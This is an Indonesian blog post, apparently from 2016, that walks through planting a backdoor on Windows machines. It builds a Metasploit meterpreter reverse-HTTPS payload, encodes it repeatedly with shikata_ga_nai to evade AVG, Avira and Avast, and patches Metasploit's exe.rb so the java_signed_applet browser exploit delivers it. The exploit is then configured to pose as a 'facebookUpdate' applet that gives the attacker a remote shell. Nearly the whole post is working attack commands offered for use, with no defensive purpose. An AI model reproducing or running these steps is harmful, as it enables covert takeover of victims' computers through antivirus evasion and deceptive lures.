Social Icons

Saturday, January 2, 2016

Memasang Backdoor di Windows


Sebenarnya simple sekali purpose dan tutorial ini, membuat malicious URL seperti yang dilakukan SET secara manual dan menempatkan backdoor sesuai dengan keinginan kita. Karena secara default backdoor yagn di buat oleh malicious java server seperti rhinno dan java_signed_applet biasanya merupakan backdoor biasa yang mudah sekali di block antivirus ... 

Ide yang baik sekali untuk memodifikasi file exe.rb dimana backdoor yang di packing dengan ekstensi java "jar" dapat diarahkan sesuai dengan backdoor yang telah kita kombinasikan dengan "msfencode" 

Tutorial ini sana buat dengan Backtrack .. sekali lagi anda tinggal menyesuaikan dengan path metasploit dan direktori anda .. karena pada dasarnya semua OS yang terinstall metasploit msf adalah sama ...

Pertama-tama kita buat backdoor untuk bypass av seperti avg,avira,avast dll
ketikkan perintah sebagai berikut
root@dvildance:/# msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.4 PORT=4444R | msfencode -e x86/shikata_ga_nai -c 10  -t exe  -o /root/dvil.exe
yup dont forget ya agar membuat outputnya ke /root coz itu yang kita pasang di script exe.rb nanti 
sekarang waktunya untuk mengdit exe.rb
buka terminal lalu ketikkan perintah selanjutnya
root@dvildance:~# cd /opt/metasploit/msf3/lib/msf/util
root@dvildance:/opt/metasploit/msf3/lib/msf/util# ls
exe.rb  svn.rb
root@dvildance:/opt/metasploit/msf3/lib/msf/util# vim exe.rb 

lalu edit di bagian jar
def self.to_jar(exe, opts={})
                spawn = opts[:spawn] || 2
                exe_name = Rex::Text.rand_text_alpha(8) +".exe"
                zip = Rex::Zip::Jar.new
                paths = [
                        "metasploit""Payload.class" ],
                ]
sehingga  menjadi
def self.to_jar(exe, opts={})
               exe = File.read("/root/dvil.exe")
               spawn = opts[:spawn] || 2
               exe_name = Rex::Text.rand_text_alpha(8) +".exe"
               zip = Rex::Zip::Jar.new
               paths = [
                       "metasploit""Payload.class" ],
               ]
      

lihat yang tulisan merah itu adalah letak backdoor yangtelah kita buat tadi dengan shikata ga nai
 Kalau semua persiapan sudah selesai .. kita buat exploit + listenernya .. memang sudah sepaket.
buka metasploit dengan msfconsole lalu ketikkan exploitnya

msf > use exploit/multi/browser/java_signed_applet (pilih exploit ini)
msf  exploit(java_signed_applet) >set payload windows/meterpreter/reverse_https (set payload .. kudu harus sama dengan backdoor awal
msf  exploit(java_signed_applet) > set URIPATH / (untuk path malicious url .. exp. http://192.168.1.9/ )
msf  exploit(java_signed_applet) > set SRVPORT 80 (port standart malicious server .. di sarankan port 80 biar langsung kebuka)
msf  exploit(java_signed_applet) > set  SRVHOST 192.168.1.9 ( lokal ip server malicious  kita )
msf  exploit(java_signed_applet) > set LHOST 192.168.1.9 ( ip lokal untuk listener)
msf  exploit(java_signed_applet) > set APPLETNAME facebookUpdate (Nama paket jar yang akan di injection ke target)
msf  exploit(java_signed_applet) > set CERTCN facebookUpdate (sertifikat java)
msf  exploit(java_signed_applet) >exploit (mulai exploit )

No comments:

 

PERHATIAN!!!Semua artikel yang diposting terlindungi....... Jika ingin Copy-Paste sertakan sumbernya :)